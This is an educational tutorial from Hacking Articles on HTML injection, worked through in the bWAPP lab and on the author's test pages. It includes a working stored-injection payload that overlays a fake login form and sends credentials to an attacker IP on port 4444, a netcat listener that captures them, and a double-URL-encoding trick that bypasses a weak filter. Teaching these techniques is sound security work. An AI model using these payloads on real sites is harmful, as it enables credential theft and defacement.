Comprehensive Guide on HTML Injection
“HTML” is considered as the skeleton for every web-application, as it defines up the structure and the complete posture of the hosted content. So have you ever wondered, if this anatomy got ruined up with some simple scripts? Or this structure itself becomes responsible for the defacements of the web-applications? Today, in this article, we’ll learn how such misconfigured HTML codes, open the gates for the attackers to manipulate the designed webpages and grabs up the sensitive data from the users.
Table of Content
- What is HTML?
- Introduction to HTML Injection
- Impact of HTML Injection
- HTML Injection v/s XSS
- Types of Injection
- Stored HTML
- Reflected HTML
- Reflected GET
- Reflected POST
- Reflected current URL
- Mitigation Steps
What is HTML?
HTML is an abbreviation to “HyperText Markup Langauge”, is the basic building block of the web, which determine the formation of the web pages over a web-application. HTML is used to design websites that consist the “HyperText” in order to include “text inside a text” as a hyperlink and a combination of elements that wrap up the data items to display in the browser.
So what these elements are?
“An element is everything to an HTML page i.e. it contains the opening and closing tag with the text content in between.”
An HTML tag label pieces of content, such as “heading”, “paragraph”, “form”, and so on. They are the element names surrounded by angle brackets and are of two types – the “start tag” also known as opening tag and the “end tag” referred to as the closing one. Browsers do not display these HTML tags but utilize them to grab up the content of the webpage.
In order to provide some extra information to the elements, we use attributes, they reside inside the start tag and comes in “name/value” pairs, such that the attribute name follows up with an “equal-to sign” and the attribute value is enclosed with the “quotation marks”.
<a href = "http://hackingarticles.in">Hacking Articles </a>
Here the “href” is the “attribute name” and “http://hackingarticles” is the “attribute value”.
As we’re now aware of the basic HTML terminologies, let’s check out the “HTML elements flowchart” and then will further try to implement them all to create up a simple web page.
Basic HTML Page:
Every web page over the internet is somewhere or the other an HTML file. These files are nothing but are the simple plain-text files with a “.html” extension, that are saved and executed over a web browser.
So let’s try to create a simple web page in our notepad and save it as hack.html:
<title> Hacking Articles lab</title>
<center><h2>WELCOME TO <a href=”http://hackingarticles.in”>HACKING ARTILCES </a></h2>
<p>Author “Raj Chandel”</p>
Let’s execute this “hack.html” file in our browser and see what we have developed.
Great!! We’ve successfully designed our first web-page. But how these tags worked for us, let’s check them out:
- The <html>element is the root element of every HTML page.
- The <head>determines the meta-information about the document.
- The <title>element specifies a title for the webpage.
- The <body>element contains the visible page content that has the “bgcolor” as an attribute as “pink”.
- The <br>element defines break line or it defines up the next line.
- The <h1>element defines a large heading.
- The <p>element defines a paragraph
- The <a> defines up the anchor tag which helps us to set up the “hyperlink”.
I guess you are now clear with “what HTML is and its major use” and “how can we implement this all”. So let’s try to find out the major loopholes and learn how the attackers inject arbitrary HTML codes into vulnerable web pages in order to modify the hosted content.
Introduction to HTML Injection
HTML Injection also termed as “virtual defacements” is one of the most simple and the most common vulnerability that arises when the web-page fails to sanitize the user-supplied input or validates the output, which thus allows the attacker to craft his payloads and injects the malicious HTML codes into the application through the vulnerable fields, such that he can modify the webpage content and even grabs up some sensitive data.
Let’s take a look over this scenario and lean how such HTML Injection attacks are executed:
Consider a web-application which is suffering from HTML Injection vulnerability and it does not validate any specific input. Thus the attacker finds this and he injects his malicious “HTML login Form” with a lure of “Free Movie tickets” to trick the victim into submitting his sensitive credentials.
Now as the victims surf that particular webpage, there he found the option to avail those “free movie tickets”. As he clicks over it, he got presented back with the application’s login screen, which is nothing but the attacker’s crafted “HTML form”. Therefore as soon as he enters his credentials, the attacker’s captures them all through his listener machine, leading the victim to compromise his data.
Impact of HTML Injection
When the input fields are not properly sanitized over in a webpage, thus sometimes this HTML Injection vulnerability might lead us to Cross-Site Scripting(XSS) or Server-Side Request Forgery(SSRF) attacks. Therefore this vulnerability has been reported with Severity Level as “Medium” and with the “CVSS Score of 5.3” under :
- CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page.
- CWE-79: Improper Neutralization of Input During Web Page Generation.
HTML Injection v/s XSS
Let’s now dive in further with the different HTML Injection attacks and check out the unusual ways how we can deface the webpages and captures up the victim’s credentials.
A “stored HTML” also termed as “Persistence” because through this vulnerability the injected malicious script gets permanently store inside the web-applications server and the application server further drops it out back to the user when he visits the injected webpage. However, when the client clicks on payload which appears as an official part of the website, thus the injected HTML code will get executed by the browser.
The most common example of Stored HTML is the “comment option” in the blogs, which allow any user to enter his feedback as in the form of comments for the administrator or other users.
Let’s now try to exploit this stored HTML vulnerability and grab up some credentials.
Exploiting Stored HTML
I’ve opened the target IP in my browser and login inside BWAPP as a bee: bug, further I’ve set the “Choose Your Bug” option to “HTML Injection – Stored (Blog)” and had fired up the hack button.
Now, we’ll be redirected to the web page which is suffering from an HTML Injection vulnerability which allows the user to submit his entry in the blog as shown in the screenshot.
Initially, we will generate a normal user entry through “bee” as “Hacking Articles”, in order to confirm that the input data has successfully stored up in the webserver’s database, which is thus visible in the “Entry field”.
Now, let’s try to inject our malicious payload that will create up a fake user login form over this targeted web page and thus it will forward the captured request over to our IP.
Enter the following HTML code inside the given text area in order to set up the HTML attack.
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">Please login with valid
credenitals:<br><form name="login" action="http://192.168.0.7:4444/login.htm">
<table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
From the below image you can see that, as I clicked over the “Submit” button, a new login form has been displayed over on the webpage. This login form is thus now into the application’s web server, which gets rendered every time whenever the victim visits this malicious login page, he’ll always have this form which looks official to him.
So let’s now enable our netcat listener at port 4444 in order to capture up the victim’s request.
nc –lvp 4444
Though its time to wait, until the victim boots this page up into his browser, and enters his credentials.
Great!! From the above image, you can see that the user “Raj” opened the webpage and tried to login inside as raj:123.
So let’s get back to our listener and check whether the credentials are captured in the response or not.
From the below image, you can see that we’ve successfully grabbed up the credentials.
The reflected HTML also known as “Non-Persistence” is occurred when the web application responds immediately on user’s input without validating what the user entered, this can lead an attacker to inject browser executable code inside the single HTML response. It is termed “non-persistent” as the malicious script does not get stored inside the webserver, thus the attacker needs to send the malicious link through phishing to trap the user.
Reflected HTML vulnerability can be easily found in website’s search engines: here the attacker writes up some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return as in response to these HTML entities.
Reflect HTML is basically of three types:
- Reflected HTML GET
- Reflected HTML POST
- Reflected HTML Current URL
Before making our hands wet by exploiting the Reflected HTML labs, let us recall that – with the GET method, we request data from a specific source whereas the POST method is used to send data to a server in order to create/update a resource.
Reflected HTML GET
Here, we’ve created a webpage, which thus permits up the user to submit a “feedback” with his “name”.
So, when the user “Raj Chandel” submits his feedback as “Good”, a message prompts back as “Thanks to Raj Chandel for your valuable time.”
Thus this instant response and the “name/value” pairs in the URL shows up that, this page might be vulnerable to HTML Injection and the data has been requested over the GET method.
So, let’s now try to inject some HTML codes into this “form” in order to be confirmed up with it. Type following script at the “Name” field as
And set Feedback to “Good”
From the below image you can see that the user’s name “Raj Chandel” has been modified as the heading as in the response message.
Wonder why this all happened, let’s check out the following code snippet.
With the ease to reflect the message on the screen, the developer didn’t set up any input validation i.e. he simply “echo” the “Thanks message” by including up the input name through the “$_GET” variable.
“There are times when the developer sets up some validations into the input fields which thus refects our HTML code back onto the screen without getting rendered.”
From the below image you can see that when I tried to execute the HTML code in the name field, it drops it back as the plain-text as:
So is the vulnerability is patched up here?
Let’s check this all out by capturing its outgoing Request with our helping hand “burpsuite” and will further send the captured request directly to the “Repeater” tab.
In the “Repeater” tab, as I clicked over the “Go” button to check for the generated response, I found that my HTML entities have been HTML decoded here as:
Thus I coped the complete HTML code “<a href = http://hackingarticles.in”><h2>Raj</h2></a>” and pasted that all into the Decoder tab. Further from the right-hand pallet, I clicked over at “Encode as” and opted for the URL one.
As we get the encoded output, we’ll again set it over in the “Encode as” for the URL to get it as in the double URL encoded format.
Let’s now try this out, copy the complete double encoded URL and paste it over in the “name=” field within the repeater tab in the Request option.
Click on the Go button to check for its generated Response.
Great!! From the below image, you can see that we’ve successfully manipulated the Response.
Now just do the similar amendments into the Proxy tab and hit the “Forward” button. From the below image you can see that, we ‘ve defaced this web page too through its validated fields.
Let’s check out the code snippet to see where the developer had made input validation:
From the below image you can see that, here the developer had made a function as “hack” for the variable data and even he had decoded the “<” and “>” to “<” and “>” for $data and $input respectively, further he used the inbuilt PHP function urldecode over for $input to decode up the URL.
From the below image you can see that the developer implemented the function hack over at the name field.
Reflected HTML POST
Similar to the “GET webpage”, the “Name” and the “Feedback” fields are vulnerable here too, since the POST method has been implemented, thus the form data won’t be displayed in the URL.
Let’s try to deface this webpage again but this time we’ll add up an image rather than a static text as
<img src= "https://www.ignitetechnologies.in/img/logo-blue-white.png">
From the below image, you can see that the “Ignite technologies logo” has been placed up over the screen, thus the attacker here can even inject other media formats such as videos, audios or the gifs.
Reflected HTML Current URL
Can a web-application be vulnerable to HTML Injection with no input fields over on the web page?
Yes, it’s not necessary to have an input filed like a comment box or search box, some applications display your URL over on their webpages and they might be vulnerable to HTML Injection, as in such cases, the URL acts as the input field to it.
From the above image, you can see that the current URL is being displayed over on the web-page as “http://192.168.0.16/hack/html_URL.php”. So let’s take over to this advantage and see what we can grab.
Tune in your “burpsuite” and capture the ongoing HTTP Request
Now let’s manipulate this request with :
Click on the Forward button to check the result over on the browser.
Great!! From the below image you can see that we have successfully defaced the website by simply injecting our desired HTML code into the web application’s URL.
Let’s have a look over its code and see how the developer managed to get the current URL over on the screen
Here the developer used the PHP global variable as $_SERVER in order to capture up the current page URL. Further, he amended the hostname with “HTTP_HOST” and the requested resource location to the URL with “REQUEST_URI” and placed it all in the $url variable.
Coming to the HTML section he simply set echo with the $url variable without any specific validation, in order to display the message with the URL.
- The developer should set up his HTML script which filters the metacharacters from user inputs.
- The developer should implement functions to validate the user inputs such that they do not contain any specific tag that can lead to virtual defacements.
Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here